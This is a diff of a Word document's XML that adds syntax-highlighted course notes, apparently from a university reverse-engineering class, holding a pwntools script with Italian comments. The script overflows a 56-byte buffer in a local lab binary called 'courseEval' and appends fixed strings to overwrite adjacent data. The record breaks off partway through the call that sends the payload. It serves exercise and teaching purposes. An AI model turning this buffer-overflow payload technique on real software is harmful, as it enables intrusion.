--- a/REVERSE_PWN.docx
+++ b/REVERSE_PWN.docx
@@ -1105,13 +1105,948 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="c586c0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="4ec9b0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pwn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="c586c0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Carica il binario (sostituisci con il path corretto)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"./courseEval"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="4ec9b0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">elf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">context</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">binary</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="4ec9b0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ELF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">checksec</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="569cd6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">False</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Avvia il processo locale</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="4ec9b0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">process</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Costruzione del payload:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># 56 per riempire buffer (vedi da IDA) e le alre cose si vedono da IDA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="569cd6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"A"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="b5cea8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">56</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="569cd6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"UniPD_01"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="569cd6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"CPP-"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="569cd6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"PWN-"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="d4d4d4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="569cd6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="ce9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"Pier"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Invia l'input al programma</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="dcdcaa"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
